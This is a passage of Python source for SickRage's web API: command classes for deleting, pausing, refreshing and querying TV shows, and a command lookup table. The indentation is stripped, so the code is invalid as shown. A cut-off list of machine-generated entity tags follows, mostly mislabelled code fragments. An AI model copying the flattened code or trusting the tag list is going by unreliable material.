# TODO: catch if cache dir is missing/invalid.. so it doesn't break show/show.cache
# return {"poster": 0, "banner": 0}
cache_obj = image_cache.ImageCache()
has_poster = 0
has_banner = 0
if ek(os.path.isfile, cache_obj.poster_path(show_obj.indexerid)):
has_poster = 1
if ek(os.path.isfile, cache_obj.banner_path(show_obj.indexerid)):
has_banner = 1
return _responds(RESULT_SUCCESS, {"poster": has_poster, "banner": has_banner})
class CMD_ShowDelete(ApiCall):
_help = {
"desc": "Delete a show in SickRage",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
"removefiles": {
"desc": "True to delete the files associated with the show, False otherwise. This can not be undone!"
},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
# optional
self.removefiles, args = self.check_params(args, kwargs, "removefiles", False, False, "bool", [])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Delete a show in SickRage """
error, show = Show.delete(self.indexerid, self.removefiles)
if error:
return _responds(RESULT_FAILURE, msg=error)
return _responds(RESULT_SUCCESS, msg='%s has been queued to be deleted' % show.name)
class CMD_ShowGetQuality(ApiCall):
_help = {
"desc": "Get the quality setting of a show",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get the quality setting of a show """
show_obj = Show.find(sickbeard.showList, int(self.indexerid))
if not show_obj:
return _responds(RESULT_FAILURE, msg="Show not found")
any_qualities, best_qualities = _map_quality(show_obj.quality)
return _responds(RESULT_SUCCESS, {"initial": any_qualities, "archive": best_qualities})
class CMD_ShowGetPoster(ApiCall):
_help = {
"desc": "Get the poster of a show",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get the poster a show """
return {
'outputType': 'image',
'image': ShowPoster(self.indexerid),
}
class CMD_ShowGetBanner(ApiCall):
_help = {
"desc": "Get the banner of a show",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get the banner of a show """
return {
'outputType': 'image',
'image': ShowBanner(self.indexerid),
}
class CMD_ShowGetNetworkLogo(ApiCall):
_help = {
"desc": "Get the network logo of a show",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
"""
:return: Get the network logo of a show
"""
return {
'outputType': 'image',
'image': ShowNetworkLogo(self.indexerid),
}
class CMD_ShowGetFanArt(ApiCall):
_help = {
"desc": "Get the fan art of a show",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get the fan art of a show """
return {
'outputType': 'image',
'image': ShowFanArt(self.indexerid),
}
class CMD_ShowPause(ApiCall):
_help = {
"desc": "Pause or un-pause a show",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
"pause": {"desc": "True to pause the show, False otherwise"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
# optional
self.pause, args = self.check_params(args, kwargs, "pause", False, False, "bool", [])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Pause or un-pause a show """
error, show = Show.pause(self.indexerid, self.pause)
if error:
return _responds(RESULT_FAILURE, msg=error)
return _responds(RESULT_SUCCESS, msg='%s has been %s' % (show.name, ('resumed', 'paused')[show.paused]))
class CMD_ShowRefresh(ApiCall):
_help = {
"desc": "Refresh a show in SickRage",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Refresh a show in SickRage """
error, show = Show.refresh(self.indexerid)
if error:
return _responds(RESULT_FAILURE, msg=error)
return _responds(RESULT_SUCCESS, msg='%s has queued to be refreshed' % show.name)
class CMD_ShowSeasonList(ApiCall):
_help = {
"desc": "Get the list of seasons of a show",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
"sort": {"desc": "Return the seasons in ascending or descending order"}
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
# optional
self.sort, args = self.check_params(args, kwargs, "sort", "desc", False, "string", ["asc", "desc"])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get the list of seasons of a show """
show_obj = Show.find(sickbeard.showList, int(self.indexerid))
if not show_obj:
return _responds(RESULT_FAILURE, msg="Show not found")
my_db = db.DBConnection(row_type="dict")
if self.sort == "asc":
sql_results = my_db.select("SELECT DISTINCT season FROM tv_episodes WHERE showid = ? ORDER BY season ASC",
[self.indexerid])
else:
sql_results = my_db.select("SELECT DISTINCT season FROM tv_episodes WHERE showid = ? ORDER BY season DESC",
[self.indexerid])
season_list = [] # a list with all season numbers
for row in sql_results:
season_list.append(int(row["season"]))
return _responds(RESULT_SUCCESS, season_list)
class CMD_ShowSeasons(ApiCall):
_help = {
"desc": "Get the list of episodes for one or all seasons of a show",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
"season": {"desc": "The season number"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
# optional
self.season, args = self.check_params(args, kwargs, "season", None, False, "int", [])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get the list of episodes for one or all seasons of a show """
sho_obj = Show.find(sickbeard.showList, int(self.indexerid))
if not sho_obj:
return _responds(RESULT_FAILURE, msg="Show not found")
my_db = db.DBConnection(row_type="dict")
if self.season is None:
sql_results = my_db.select(
"SELECT name, episode, airdate, status, release_name, season, location, file_size, subtitles FROM tv_episodes WHERE showid = ?",
[self.indexerid])
seasons = {}
for row in sql_results:
status, quality = Quality.splitCompositeStatus(int(row["status"]))
row["status"] = _get_status_strings(status)
row["quality"] = get_quality_string(quality)
if helpers.tryInt(row['airdate'], 1) > 693595: # 1900
dt_episode_airs = sbdatetime.sbdatetime.convert_to_setting(
network_timezones.parse_date_time(row['airdate'], sho_obj.airs, sho_obj.network))
row['airdate'] = sbdatetime.sbdatetime.sbfdate(dt_episode_airs, d_preset=dateFormat)
else:
row['airdate'] = 'Never'
cur_season = int(row["season"])
cur_episode = int(row["episode"])
del row["season"]
del row["episode"]
if cur_season not in seasons:
seasons[cur_season] = {}
seasons[cur_season][cur_episode] = row
else:
sql_results = my_db.select(
"SELECT name, episode, airdate, status, location, file_size, release_name, subtitles FROM tv_episodes WHERE showid = ? AND season = ?",
[self.indexerid, self.season])
if len(sql_results) == 0:
return _responds(RESULT_FAILURE, msg="Season not found")
seasons = {}
for row in sql_results:
cur_episode = int(row["episode"])
del row["episode"]
status, quality = Quality.splitCompositeStatus(int(row["status"]))
row["status"] = _get_status_strings(status)
row["quality"] = get_quality_string(quality)
if helpers.tryInt(row['airdate'], 1) > 693595: # 1900
dt_episode_airs = sbdatetime.sbdatetime.convert_to_setting(
network_timezones.parse_date_time(row['airdate'], sho_obj.airs, sho_obj.network))
row['airdate'] = sbdatetime.sbdatetime.sbfdate(dt_episode_airs, d_preset=dateFormat)
else:
row['airdate'] = 'Never'
if cur_episode not in seasons:
seasons[cur_episode] = {}
seasons[cur_episode] = row
return _responds(RESULT_SUCCESS, seasons)
class CMD_ShowSetQuality(ApiCall):
_help = {
"desc": "Set the quality setting of a show. If no quality is provided, the default user setting is used.",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
"initial": {"desc": "The initial quality of the show"},
"archive": {"desc": "The archive quality of the show"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
# optional
# this for whatever reason removes hdbluray not sdtv... which is just wrong. reverting to previous code.. plus we didnt use the new code everywhere.
# self.archive, args = self.check_params(args, kwargs, "archive", None, False, "list", _get_quality_map().values()[1:])
self.initial, args = self.check_params(args, kwargs, "initial", None, False, "list",
["sdtv", "sddvd", "hdtv", "rawhdtv", "fullhdtv", "hdwebdl",
"fullhdwebdl", "hdbluray", "fullhdbluray", "unknown"])
self.archive, args = self.check_params(args, kwargs, "archive", None, False, "list",
["sddvd", "hdtv", "rawhdtv", "fullhdtv", "hdwebdl",
"fullhdwebdl",
"hdbluray", "fullhdbluray"])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Set the quality setting of a show. If no quality is provided, the default user setting is used. """
show_obj = Show.find(sickbeard.showList, int(self.indexerid))
if not show_obj:
return _responds(RESULT_FAILURE, msg="Show not found")
quality_map = {'sdtv': Quality.SDTV,
'sddvd': Quality.SDDVD,
'hdtv': Quality.HDTV,
'rawhdtv': Quality.RAWHDTV,
'fullhdtv': Quality.FULLHDTV,
'hdwebdl': Quality.HDWEBDL,
'fullhdwebdl': Quality.FULLHDWEBDL,
'hdbluray': Quality.HDBLURAY,
'fullhdbluray': Quality.FULLHDBLURAY,
'unknown': Quality.UNKNOWN}
# use default quality as a fail-safe
new_quality = int(sickbeard.QUALITY_DEFAULT)
i_quality_id = []
a_quality_id = []
if self.initial:
for quality in self.initial:
i_quality_id.append(quality_map[quality])
if self.archive:
for quality in self.archive:
a_quality_id.append(quality_map[quality])
if i_quality_id or a_quality_id:
new_quality = Quality.combineQualities(i_quality_id, a_quality_id)
show_obj.quality = new_quality
return _responds(RESULT_SUCCESS,
msg=show_obj.name + " quality has been changed to " + get_quality_string(show_obj.quality))
class CMD_ShowStats(ApiCall):
_help = {
"desc": "Get episode statistics for a given show",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get episode statistics for a given show """
show_obj = Show.find(sickbeard.showList, int(self.indexerid))
if not show_obj:
return _responds(RESULT_FAILURE, msg="Show not found")
# show stats
episode_status_counts_total = {"total": 0}
for status in statusStrings:
if status in [UNKNOWN, DOWNLOADED, SNATCHED, SNATCHED_PROPER, ARCHIVED]:
continue
episode_status_counts_total[status] = 0
# add all the downloaded qualities
episode_qualities_counts_download = {"total": 0}
for statusCode in Quality.DOWNLOADED + Quality.ARCHIVED:
status, quality = Quality.splitCompositeStatus(statusCode)
if quality in [Quality.NONE]:
continue
episode_qualities_counts_download[statusCode] = 0
# add all snatched qualities
episode_qualities_counts_snatch = {"total": 0}
for statusCode in Quality.SNATCHED + Quality.SNATCHED_PROPER:
status, quality = Quality.splitCompositeStatus(statusCode)
if quality in [Quality.NONE]:
continue
episode_qualities_counts_snatch[statusCode] = 0
my_db = db.DBConnection(row_type="dict")
sql_results = my_db.select("SELECT status, season FROM tv_episodes WHERE season != 0 AND showid = ?",
[self.indexerid])
# the main loop that goes through all episodes
for row in sql_results:
status, quality = Quality.splitCompositeStatus(int(row["status"]))
episode_status_counts_total["total"] += 1
if status in Quality.DOWNLOADED + Quality.ARCHIVED:
episode_qualities_counts_download["total"] += 1
episode_qualities_counts_download[int(row["status"])] += 1
elif status in Quality.SNATCHED + Quality.SNATCHED_PROPER:
episode_qualities_counts_snatch["total"] += 1
episode_qualities_counts_snatch[int(row["status"])] += 1
elif status == 0: # we don't count NONE = 0 = N/A
pass
else:
episode_status_counts_total[status] += 1
# the outgoing container
episodes_stats = {"downloaded": {}}
# turning codes into strings
for statusCode in episode_qualities_counts_download:
if statusCode == "total":
episodes_stats["downloaded"]["total"] = episode_qualities_counts_download[statusCode]
continue
status, quality = Quality.splitCompositeStatus(int(statusCode))
status_string = Quality.qualityStrings[quality].lower().replace(" ", "_").replace("(", "").replace(")", "")
episodes_stats["downloaded"][status_string] = episode_qualities_counts_download[statusCode]
episodes_stats["snatched"] = {}
# turning codes into strings
# and combining proper and normal
for statusCode in episode_qualities_counts_snatch:
if statusCode == "total":
episodes_stats["snatched"]["total"] = episode_qualities_counts_snatch[statusCode]
continue
status, quality = Quality.splitCompositeStatus(int(statusCode))
status_string = Quality.qualityStrings[quality].lower().replace(" ", "_").replace("(", "").replace(")", "")
if Quality.qualityStrings[quality] in episodes_stats["snatched"]:
episodes_stats["snatched"][status_string] += episode_qualities_counts_snatch[statusCode]
else:
episodes_stats["snatched"][status_string] = episode_qualities_counts_snatch[statusCode]
# episodes_stats["total"] = {}
for statusCode in episode_status_counts_total:
if statusCode == "total":
episodes_stats["total"] = episode_status_counts_total[statusCode]
continue
status, quality = Quality.splitCompositeStatus(int(statusCode))
status_string = statusStrings[statusCode].lower().replace(" ", "_").replace("(", "").replace(
")", "")
episodes_stats[status_string] = episode_status_counts_total[statusCode]
return _responds(RESULT_SUCCESS, episodes_stats)
class CMD_ShowUpdate(ApiCall):
_help = {
"desc": "Update a show in SickRage",
"requiredParameters": {
"indexerid": {"desc": "Unique ID of a show"},
},
"optionalParameters": {
"tvdbid": {"desc": "thetvdb.com unique ID of a show"},
}
}
def __init__(self, args, kwargs):
# required
self.indexerid, args = self.check_params(args, kwargs, "indexerid", None, True, "int", [])
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Update a show in SickRage """
show_obj = Show.find(sickbeard.showList, int(self.indexerid))
if not show_obj:
return _responds(RESULT_FAILURE, msg="Show not found")
try:
sickbeard.showQueueScheduler.action.updateShow(show_obj, True) # @UndefinedVariable
return _responds(RESULT_SUCCESS, msg=str(show_obj.name) + " has queued to be updated")
except CantUpdateShowException as e:
logger.log(u"API::Unable to update show: {0}".format(str(e)), logger.DEBUG)
return _responds(RESULT_FAILURE, msg="Unable to update " + str(show_obj.name))
class CMD_Shows(ApiCall):
_help = {
"desc": "Get all shows in SickRage",
"optionalParameters": {
"sort": {"desc": "The sorting strategy to apply to the list of shows"},
"paused": {"desc": "True to include paused shows, False otherwise"},
},
}
def __init__(self, args, kwargs):
# required
# optional
self.sort, args = self.check_params(args, kwargs, "sort", "id", False, "string", ["id", "name"])
self.paused, args = self.check_params(args, kwargs, "paused", None, False, "bool", [])
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get all shows in SickRage """
shows = {}
for curShow in sickbeard.showList:
if not self.paused and curShow.paused: # If we're not including paused shows, and the current show is paused
continue # continue with the next show
indexer_show = helpers.mapIndexersToShow(curShow)
show_dict = {
"paused": (0, 1)[curShow.paused],
"quality": get_quality_string(curShow.quality),
"language": curShow.lang,
"air_by_date": (0, 1)[curShow.air_by_date],
"sports": (0, 1)[curShow.sports],
"anime": (0, 1)[curShow.anime],
"indexerid": curShow.indexerid,
"tvdbid": indexer_show[1],
"network": curShow.network,
"show_name": curShow.name,
"status": curShow.status,
"subtitles": (0, 1)[curShow.subtitles],
}
if helpers.tryInt(curShow.nextaired, 1) > 693595: # 1900
dt_episode_airs = sbdatetime.sbdatetime.convert_to_setting(
network_timezones.parse_date_time(curShow.nextaired, curShow.airs, show_dict['network']))
show_dict['next_ep_airdate'] = sbdatetime.sbdatetime.sbfdate(dt_episode_airs, d_preset=dateFormat)
else:
show_dict['next_ep_airdate'] = ''
show_dict["cache"] = CMD_ShowCache((), {"indexerid": curShow.indexerid}).run()["data"]
if not show_dict["network"]:
show_dict["network"] = ""
if self.sort == "name":
shows[curShow.name] = show_dict
else:
shows[curShow.indexerid] = show_dict
return _responds(RESULT_SUCCESS, shows)
class CMD_ShowsStats(ApiCall):
_help = {"desc": "Get the global shows and episodes statistics"}
def __init__(self, args, kwargs):
# required
# optional
# super, missing, help
ApiCall.__init__(self, args, kwargs)
def run(self):
""" Get the global shows and episodes statistics """
stats = Show.overall_stats()
return _responds(RESULT_SUCCESS, {
'ep_downloaded': stats['episodes']['downloaded'],
'ep_snatched': stats['episodes']['snatched'],
'ep_total': stats['episodes']['total'],
'shows_active': stats['shows']['active'],
'shows_total': stats['shows']['total'],
})
# WARNING: never define a cmd call string that contains a "_" (underscore)
# this is reserved for cmd indexes used while cmd chaining
# WARNING: never define a param name that contains a "." (dot)
# this is reserved for cmd namespaces used while cmd chaining
function_mapper = {
"help": CMD_Help,
"future": CMD_ComingEpisodes,
"episode": CMD_Episode,
"episode.search": CMD_EpisodeSearch,
"episode.setstatus": CMD_EpisodeSetStatus,
"episode.subtitlesearch": CMD_SubtitleSearch,
"exceptions": CMD_Exceptions,
"history": CMD_History,
"history.clear": CMD_HistoryClear,
"history.trim": CMD_HistoryTrim,
"failed": CMD_Failed,
"backlog": CMD_Backlog,
"logs": CMD_Logs,
"sb": CMD_SickBeard,
"postprocess": CMD_PostProcess,
"sb.addrootdir": CMD_SickBeardAddRootDir,
"sb.checkversion": CMD_SickBeardCheckVersion,
"sb.checkscheduler": CMD_SickBeardCheckScheduler,
"sb.deleterootdir": CMD_SickBeardDeleteRootDir,
"sb.getdefaults": CMD_SickBeardGetDefaults,
"sb.getmessages": CMD_SickBeardGetMessages,
"sb.getrootdirs": CMD_SickBeardGetRootDirs,
"sb.pausebacklog": CMD_SickBeardPauseBacklog,
"sb.ping": CMD_SickBeardPing,
"sb.restart": CMD_SickBeardRestart,
"sb.searchindexers": CMD_SickBeardSearchIndexers,
"sb.searchtvdb": CMD_SickBeardSearchTVDB,
"sb.searchtvrage": CMD_SickBeardSearchTVRAGE,
"sb.setdefaults": CMD_SickBeardSetDefaults,
"sb.update": CMD_SickBeardUpdate,
"sb.shutdown": CMD_SickBeardShutdown,
"show": CMD_Show,
"show.addexisting": CMD_ShowAddExisting,
"show.addnew": CMD_ShowAddNew,
"show.cache": CMD_ShowCache,
"show.delete": CMD_ShowDelete,
"show.getquality": CMD_ShowGetQuality,
"show.getposter": CMD_ShowGetPoster,
"show.getbanner": CMD_ShowGetBanner,
"show.getnetworklogo": CMD_ShowGetNetworkLogo,
"show.getfanart": CMD_ShowGetFanArt,
"show.pause": CMD_ShowPause,
"show.refresh": CMD_ShowRefresh,
"show.seasonlist": CMD_ShowSeasonList,
"show.seasons": CMD_ShowSeasons,
"show.setquality": CMD_ShowSetQuality,
"show.stats": CMD_ShowStats,
"show.update": CMD_ShowUpdate,
"shows": CMD_Shows,
"shows.stats": CMD_ShowsStats
}
| 116,822 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['URL', 'http://code.google.com/p/sickbeard/'], ['PERSON', 'Dennis Lutter'], ['PERSON', 'Jonathon Saine'], ['LOCATION', 'http://code.google.com/p/sickbeard/'], ['PERSON', 'TODO'], ['LOCATION', 'sickrage.show'], ['LOCATION', 'sickrage.show'], ['LOCATION', 'sickrage.show'], ['LOCATION', 'sbdatetime'], ['PERSON', 'simplejson'], ['PERSON', 'RESULT_FAILURE'], ['PERSON', 'RESULT_ERROR'], ['PERSON', 'RESULT_FATAL'], ['PERSON', 'RESULT_FAILURE'], ['PERSON', 'RESULT_ERROR'], ['PERSON', 'RESULT_FATAL'], ['LOCATION', 'kwargs.iteritems'], ['PERSON', 'out_dict'], ['PERSON', 'out_dict'], ['PERSON', 'cmd_index = cmd.split'], ['PERSON', 'out_dict'], ['PERSON', 'out_dict = cur_out_dict\n\n '], ['PERSON', 'out_dict = _'], ['PERSON', 'out_dict'], ['NRP', 'kwargs'], ['PERSON', 'cur_args'], ['PERSON', 'cur_args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'old_key'], ['PERSON', 'fullhdtv'], ['PERSON', 'hdwebdl'], ['PERSON', 'root_dir'], ['PERSON', 'CMD_Help(ApiCall'], ['LOCATION', 'self.check_params(args'], ['NRP', 'self.subject'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['DATE_TIME', 'weekday'], ['PERSON', "coming_episode['weekday"], ['DATE_TIME', 'season'], ['DATE_TIME', 'season'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['DATE_TIME', 'season'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['DATE_TIME', '1900'], ['LOCATION', 'show_obj.airs'], ['DATE_TIME', 'season'], ['DATE_TIME', 'season'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['DATE_TIME', 'season'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['LOCATION', 'isinstance(ep_obj'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'TODO'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', "msg='Unable"], ['DATE_TIME', 'season'], ['DATE_TIME', 'season'], ['DATE_TIME', 'season'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['DATE_TIME', 'season'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'self.force'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'responds(RESULT_FAILURE'], ['DATE_TIME', 'season'], ['DATE_TIME', "'season'"], ['PERSON', 'ep.season'], ['DATE_TIME', 'season'], ['DATE_TIME', 'season'], ['DATE_TIME', 'season'], ['PERSON', 'responds(RESULT_FAILURE'], ['DATE_TIME', 'season'], ['DATE_TIME', 'season'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['DATE_TIME', 'season'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['LOCATION', 'isinstance(ep_obj'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', "msg='Unable"], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', "msg='Unable"], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['DATE_TIME', 'older than 30 days'], ['DATE_TIME', 'older than 30 days'], ['DATE_TIME', "older than 30 days'"], ['LOCATION', 'self.check_params(args'], ['DATE_TIME', 'season'], ['LOCATION', 'cur_ep_cat'], ['LOCATION', 'cur_ep_cat'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'Mark'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'hardlink'], ['URL', 'self.is'], ['LOCATION', 'self.check_params(args'], ['URL', 'self.ch'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'msg="You'], ['PERSON', 'dGet'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['URL', 'new.in'], ['PERSON', 'check_version.updater.get_newest_commit_hash'], ['PERSON', 'backlog_running = sickbeard.searchQueueScheduler.action.is_backlog_in_progress'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'curNewRootDir'], ['PERSON', 'enumerate(root_dirs_new'], ['PERSON', 'curNewRootDir'], ['PERSON', 'COMING_EPS_DISPLAY_PAUSED'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'msg="Backlog un-'], ['PERSON', 'Ping SickRage'], ['PERSON', 'responds(RESULT_FAILURE'], ['LOCATION', 'msg="SickRage'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'responds(RESULT_FAILURE'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'hdwebdl'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'hdwebdl'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'hdwebdl'], ['DATE_TIME', '5'], ['DATE_TIME', '6'], ['PERSON', 'COMING_EPS_DISPLAY_PAUSED = int(self.future_show_paused'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'responds(RESULT_FAILURE'], ['LOCATION', 'msg="SickRage'], ['PERSON', 'responds(RESULT_FAILURE'], ['LOCATION', 'msg="SickRage'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'CMD_ShowCache'], ['LOCATION', 'genre_list_tmp'], ['LOCATION', 'genre_list_tmp'], ['LOCATION', 'genre_list.append(genre'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'hdwebdl'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'hdwebdl'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'responds(RESULT_FAILURE'], ['LOCATION', 'SR'], ['PERSON', 'hdwebdl'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'hdwebdl'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'hdwebdl'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'hdwebdl'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'responds(RESULT_FAILURE'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'TODO'], ['LOCATION', 'cache_obj.poster_path(show_obj.indexerid'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', "msg='%s"], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'ShowNetworkLogo(self.indexerid'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'ShowFanArt(self.indexerid'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', "msg='%s"], ['LOCATION', 'self.check_params(args'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', "msg='%s"], ['DATE_TIME', 'seasons'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['DATE_TIME', 'seasons'], ['PERSON', 'responds(RESULT_FAILURE'], ['DATE_TIME', 'season'], ['NRP', 'season_list'], ['DATE_TIME', 'season'], ['DATE_TIME', 'season'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['DATE_TIME', 'season'], ['PERSON', 'responds(RESULT_FAILURE'], ['DATE_TIME', 'season'], ['DATE_TIME', '1900'], ['PERSON', 'del row["season'], ['DATE_TIME', 'seasons'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'del row["episode'], ['DATE_TIME', '1900'], ['DATE_TIME', 'seasons'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'hdwebdl'], ['LOCATION', 'self.check_params(args'], ['PERSON', 'hdwebdl'], ['PERSON', 'responds(RESULT_FAILURE'], ['PERSON', 'hdwebdl'], ['LOCATION', 'self.check_params(args'], ['PERSON', 